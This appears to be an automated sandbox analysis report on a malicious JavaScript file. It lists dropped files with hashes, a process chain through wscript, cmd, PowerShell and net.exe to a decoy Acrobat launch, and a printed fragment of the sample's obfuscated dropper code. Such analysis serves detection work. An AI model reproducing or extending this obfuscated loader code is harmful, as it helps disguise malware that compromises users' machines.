Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.657801159019547 |
Encrypted: | false |
SSDEEP: | 24:Yv6XMKIliXnamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSx:Yv+IMX/BgkDMUJUAh8cvMx |
MD5: | 6CD5CAA9A5226CC9BBC8D88794E8DF24 |
SHA1: | 82C1C4BB1CCDEA90DE0CA7D2AEA78C082568E975 |
SHA-256: | 371D07848BF1D4A93F2DF2052E2F858EFFEA1B226E57481EC1F0D05D98E3F01E |
SHA-512: | B4CDC485E5CB518AB9C54A2F1AB790BCF28AD735E7FDF8A581D95C6980F68CF1748588FDBAF6CE13014B2BDAC6F95867A73E7D585993E905DBC426C1C3CD0140 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.2334040270679125 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHQcafXGVEwlAR+FIbRI6XVW7+0Y+2RUoAvJfshHHrPeUkwRe9:YvXKXpaKI0YpW7X2RnGUUUkee9 |
MD5: | 9A0DB884F718875DD9B54BB05DB9554A |
SHA1: | 2A26381580B0B52983640EFA7327B276DB8D149C |
SHA-256: | AA8BB85EB844A978AF5E4BF304F72CD6E906F9B1F4F0A6D33FD6E43CE1CE2C57 |
SHA-512: | 57F12CD23FB25EF657683F7552FAB7026A699ABEB10DE4A10BBE382FE0680B1E436BB42864C9AE4EE75007AA6BD86FC4763EE68400D0BFF226B4F6B1D3289906 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.243426992550959 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXHQcafXGVEwlAR+FIbRI6XVW7+0Y+2RUoAvJTqgFCrPeUkwRe9:YvXKXpaKI0YpW7X2RnGTq16Ukee9 |
MD5: | 20AB6CA9A6C7AC0D609AECD81550295E |
SHA1: | 2EAA0B1EED3E2EE5453C5CC0CAAD2C8DBA9441D0 |
SHA-256: | 20BA4488D7A2F165F9705DB23A64E9A39B1BBA06005791A7FD03457B90A471EE |
SHA-512: | 8AA183619E62CE4C1C7173F386586DEC26BD8B99292099B8C96F939D402ADA3772C1CD1DD1A3332E454CAA477B7E9BD2129F4001B9610F4ACCE91A616A7668EA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.114762914702205 |
Encrypted: | false |
SSDEEP: | 24:YWNB1QaXd7nayh/LCbTSKJF77cPpj7j0SPqFqNVCT222LShCVa48IJVMbVc51ohQ:Ym1GSKWXIug3/M8IJVMbCgXh96 |
MD5: | 570BBD050BA6B50B845C61F81186F876 |
SHA1: | F51D0CBBD093C3C03EB38021050B48B8A45E4B98 |
SHA-256: | BC541DB5B4F574E2659DE45B7A2431A69656B42DA2F0C6DD129E2F37F1A6CC3D |
SHA-512: | 81526433F38D1AF098854B6FD1CABC6989CE4CA2A534F2F129B135A6E3E5C0B2760A56DA52AD144161D5F7219879B589518567325C72C6D4A4E0B95E2A497D5C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.0006212053876988 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msvgObJ1/SpYJumBN3uZ4ySF:lNVmsIOFQpK9F |
MD5: | DF5228EE027A9C72026025DB567CC71D |
SHA1: | 0B077977F736C877481993956F869118496CA0ED |
SHA-256: | 33FA5B305EDC9904D79466CBBA7CBECC069B2EBDE52BE9BBD25EE0828FDD5717 |
SHA-512: | E25EEAD550FC8B76C98AB9F70624769B8B7726933F8061F234DA3C77A8E49449CF8B0448DF252F0BAD46A99088A9A7A57AE8239FE6D8CC4756B2EBE85866D496 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.3632667632185416 |
Encrypted: | false |
SSDEEP: | 48:7MGgOVpp/SpYJumBN3uZ4ySMvqFl2GL7ms9:7COVpMpK9MvKVms9 |
MD5: | 1BDFC18032E83E5B0799814A1214CD03 |
SHA1: | 9E5EB0B1F0E5AAF2391ABA4A9B2820FC835347CE |
SHA-256: | 41DB5D0D64216B5AAEF68B6EC541F9FB8470926D93033790A684A89E296B2857 |
SHA-512: | 7B353A6D4C4E9D8E150E191ABFF79156A64C0BB8D66F1E23D1E608B8CB866D3125F24E1349CEA315488473CB2A75D6B4779EDBAB8DFED839033A73897FB63D0E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgiGh4Vv5H0emxTGtmzNao9OuJx7ZYyu:6a6TZ44ADEiGh4VxHFmxKpwZK |
MD5: | AD165A383165B1B548E459FB8056F886 |
SHA1: | C6F926DA624204E1AF151DB71A5D83EAE48D1D3B |
SHA-256: | F30073B733FE73057E8A5E89EA5EAD52BA9E36BA735DDED5AA126B59C97694AC |
SHA-512: | 8010ED3DDD0873C4F0DB9B96AA179D5E7EACFAA99AF23F97B88DF8512B7D3C3BF04986B58AFC8082FE2F1687E36CF859D08B41E9634DD2D459510E4FFB4526FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1510207563435464 |
Encrypted: | false |
SSDEEP: | 3:Nlllullkv/tz:NllU+v/ |
MD5: | 6442F277E58B3984BA5EEE0C15C0C6AD |
SHA1: | 5343ADC2E7F102EC8FB6A101508730898CB14F57 |
SHA-256: | 36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D |
SHA-512: | F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.513199765407527 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClusle:Qw946cPbiOxDlbYnuRK+bph |
MD5: | D9CA688B33DC41EB29B9AAED25F29AB4 |
SHA1: | 23BA9F103900A8E58BA31D31B741852BF96B6681 |
SHA-256: | B0316E00C2A3C9DBB0D9A9F058825C473BFBAF5902F5AF9A3BB62CA774C78AAB |
SHA-512: | 3C7CDBE97DB6217D9682AD62179CB3988BA58D930B1EC7407F8BCD59A63C3DB563C53D6DE68046FEA8E631430BD7D154C8CBACB49EAB8F01D2071270CCEB619B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 108058 |
Entropy (8bit): | 7.99199742595327 |
Encrypted: | true |
SSDEEP: | 1536:Ovj3fXvOA7zO3qgSPp67cNtHbKpPBXrzyUVLOhCyhrzDDvc4DZsRMRa5rVaJNEhi:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJcq |
MD5: | 0178C6EE26590A8ABFC1CBD5BB5C335F |
SHA1: | DBE042C4F652E96C34BC10FDCE2ECD8485077158 |
SHA-256: | 922CE47ECFC6144A881C2C9A06EE99F73DA4506E8F796FCC79E982599B364E33 |
SHA-512: | 310E5B93360ED2394B097A464A38692D58E51C4000D13C07DF1A07743160F2F2399F3AEAF26EEA8AB8C4DE780E91F7BE1B0CDF8438637C0EC825A34C21EF5E22 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 23-33-20-817.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.376360055978702 |
Encrypted: | false |
SSDEEP: | 384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn |
MD5: | 1336667A75083BF81E2632FABAA88B67 |
SHA1: | 46E40800B27D95DAED0DBB830E0D0BA85C031D40 |
SHA-256: | F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1 |
SHA-512: | D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.3677260197163825 |
Encrypted: | false |
SSDEEP: | 384:e1PFGozLwrW8b5nmE3/ODpv2apoP+tdY+xbvaSipx/QaxnOG7/i/CXH93ywtDv2A:KfU |
MD5: | 3C43B8792FD91AD94C919E21009230A3 |
SHA1: | 0EFD93B6421555CB7CED5DC4873D438EC1FC9104 |
SHA-256: | E55D681E60D3BA274E86ECD90E4CD95A79880F0C15C2EDFA28A418725AB96B7B |
SHA-512: | 8ABCC494B883436983D8D7D8484309F640063F1B71F70CBB6EC56EA1B3D61332EE2AC2E4CDDC9B2452E1142B5E22E68AF592C2D0C1F9CF7978B40C6F5EF0C7EC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.394507142910401 |
Encrypted: | false |
SSDEEP: | 768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbG:1g |
MD5: | 611BD32AF8EE892568E868A0DD4D27E4 |
SHA1: | D277CBCECD875E5D1E07B8038886C4EDAEAD4CFA |
SHA-256: | FE632B006F36A6958F83995089AA2CA8BB879FECAF89FB601913163B0B86C6C6 |
SHA-512: | DF5CF0B4339EB28271C5D0F5391A288CF3D853C8C73BF354F6ECF40C1E5B7B66EE4D8E6E9ECE80977F463CBFCA1C3B4B3806F80CCBE87AD213BF1E066071D518 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xTwYIGNPgeWL07oYGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JTwZG/WLxYGZN3mlind9i4ufFXpAXkru |
MD5: | 62F2E9F22B4021BA764763F066157442 |
SHA1: | 0BBCDDCCA2B7342980503F1522E9249B077DED4C |
SHA-256: | 747B773557070E01063EDCDF20C3DA8DD01599EF5EE5E5320BA7328DFDB2E721 |
SHA-512: | 0D58BA35B2BBE548612357D9252FD87DDDC939B346DC666778CCE2C44E60F4A58434A42FDA5BDC7DF9552999D29ACD35E2F77FC5BD3D423B336F224D157F00A6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:bWNh3P6+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:C3PDegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 59EE5E2FB56A099CAA8EDFD7AF821ED6 |
SHA1: | F5DC4F876768D57B69EC894ADE0A66E813BFED92 |
SHA-256: | E100AAAA4FB2B3D78E3B6475C3B48BE189C5A39F73CFC2D22423F2CE928D3E75 |
SHA-512: | 77A45C89F6019F92576D88AE67B59F9D6D36BA6FDC020419DAB55DBD8492BA97B3DAC18278EB0210F90758B3D643EA8DCF8EC2BD1481930A59B8BB515E7440FE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 14456 |
Entropy (8bit): | 4.2098179599164975 |
Encrypted: | false |
SSDEEP: | 192:gcPqYV/saFlwwR+kMqe8TlZMX1sgUVa3ddMVsuNeMcGdSD9obOUAVlcMudM/Y14e:g7Q/X4kMb0lZ6mgtdHOelGdWaolvsTZ |
MD5: | 32FCA302C8B872738373D7CCB1E75FD4 |
SHA1: | DA85FAF24ED0ECFD5D69CCFD6286D8B77D7EB4F1 |
SHA-256: | CD0DD26304B88C20801FE80B33C49C009E2E5D4411B5D7F83252E1D90CD461C6 |
SHA-512: | 57F8CC85FAFB15455074431216E47433E50DF5DE74ED74C395B7FF2C433DB7CE06F0A1C1FE1EFDC17229DBC33325D559789F43901556DD1A12963B94F01D5A1F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.932624208829126 |
TrID: | |
File name: | 10256249222235922013.js |
File size: | 20'183 bytes |
MD5: | 5e3ebd451c1b704718049b7d88acaa31 |
SHA1: | 7f8c19d348961d15425b7c14ccea1c3bd3bd6289 |
SHA256: | 4b8b263877a234532aed566fccc2b72c48760115cc3bffc1c101931c54091e14 |
SHA512: | a6dd1ab68d7beb9525eda1fb715954cbefdf20e56c7ad6465be4da7e32b796b471dbb31d5b172b91a5fc8c01ce9ed6837391b19c8dec9739222858c6ef3eb43e |
SSDEEP: | 384:dZcCRx8H/Y/OnnxqznxqepleCFQdi/xkD+8HnrBbhz0eiGZtGRw3pFM3I5hSE:dZcw8HwmnnxqznxqwlCdiChVi8EwbM36 |
TLSH: | 6192A6D0891177534DDD0EB0A93F08F5339C03C2CAB9A57BD295829E76357A353EA2B0 |
File Content Preview: | function igvve(){pjqhukdfr=[1031,3079,5127,4103,2055,3072];var fageuycbm=this[losstjnh+htwbuj+kqzqhfn+vbferaos+xnwzm+zipmy+grxkfgpfg+lxmzify](this[vuducinyl+xyekmeks+cigcycte+kqzqhfn+fbtikzcu+losstjnh+lxmzify][wqwpwcwz+kqzqhfn+xnwzm+htwbuj+lxmzify+xnwzm+s |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 23:33:08 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff79ea20000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 23:33:09 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75a120000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 23:33:09 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d64d0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 23:33:09 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7be880000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 23:33:17 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff686a00000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 23:33:17 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75a120000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 23:33:17 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff61a770000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 23:33:18 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6413e0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 23:33:18 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7e52b0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 23:33:19 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6413e0000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function igvve() { |
|
1 | pjqhukdfr = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var fageuycbm = this[losstjnh + htwbuj + kqzqhfn + vbferaos + xnwzm + zipmy + grxkfgpfg + lxmzify] ( this[vuducinyl + xyekmeks + cigcycte + kqzqhfn + fbtikzcu + losstjnh + lxmzify][wqwpwcwz + kqzqhfn + xnwzm + htwbuj + lxmzify + xnwzm + syvdowd + ykkkdahlm + dejvyzf + xnwzm + cigcycte + lxmzify] ( vuducinyl + xyekmeks + cigcycte + kqzqhfn + fbtikzcu + losstjnh + lxmzify + qdkehtl + xyekmeks + zdzlz + xnwzm + rgpvebgza + rgpvebgza ) [rnnit + xnwzm + ccbze + rnnit + xnwzm + htwbuj + gxxqzf] ( wknaxvtx + asfap + pmpwubr + uourjwb + epsrp + wqwpwcwz + qdsetziay + rnnit + rnnit + pmpwubr + edglu + wkqcel + epsrp + qdsetziay + xyekmeks + pmpwubr + rnnit + nyxnkrrw + wqwpwcwz + datnpw + grxkfgpfg + lxmzify + kqzqhfn + datnpw + rgpvebgza + jhrwoyuq + xfzgeojc + htwbuj + grxkfgpfg + xnwzm + rgpvebgza + nyxnkrrw + zipmy + grxkfgpfg + lxmzify + xnwzm + kqzqhfn + grxkfgpfg + htwbuj + lxmzify + fbtikzcu + datnpw + grxkfgpfg + htwbuj + rgpvebgza + nyxnkrrw + kocddhpf + datnpw + cigcycte + htwbuj + rgpvebgza + xnwzm ), 16 ); |
|
